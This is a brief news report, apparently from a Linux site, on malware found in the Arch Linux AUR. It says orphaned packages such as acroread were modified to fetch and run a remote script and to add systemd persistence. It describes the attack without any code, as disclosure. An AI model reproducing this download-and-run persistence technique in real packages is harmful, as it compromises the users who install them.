Malware found in the Arch Linux AUR repository

Here's areport in Sensors Tech Forum on the discovery of a set of hostilepackages in the Arch Linux AUR repository system. AUR containsuser-contributed packages, of course; it's not a part of the Arch distributionitself. "The security investigation shows that shows that amalicious user with the nick name xeactor modified in June 7 an orphanedpackage (software without an active maintainer) called acroread. Thechanges included a curl script that downloads and runs a script from aremote site. This installs a persistent software that reconfigures systemdin order to start periodically. While it appears that they are not aserious threat to the security of the infected hosts, the scripts can bemanipulated at any time to include arbitrary code. Two other packages weremodified in the same manner." Thisthread in the aur-general list shows the timeline of the discovery andresponse.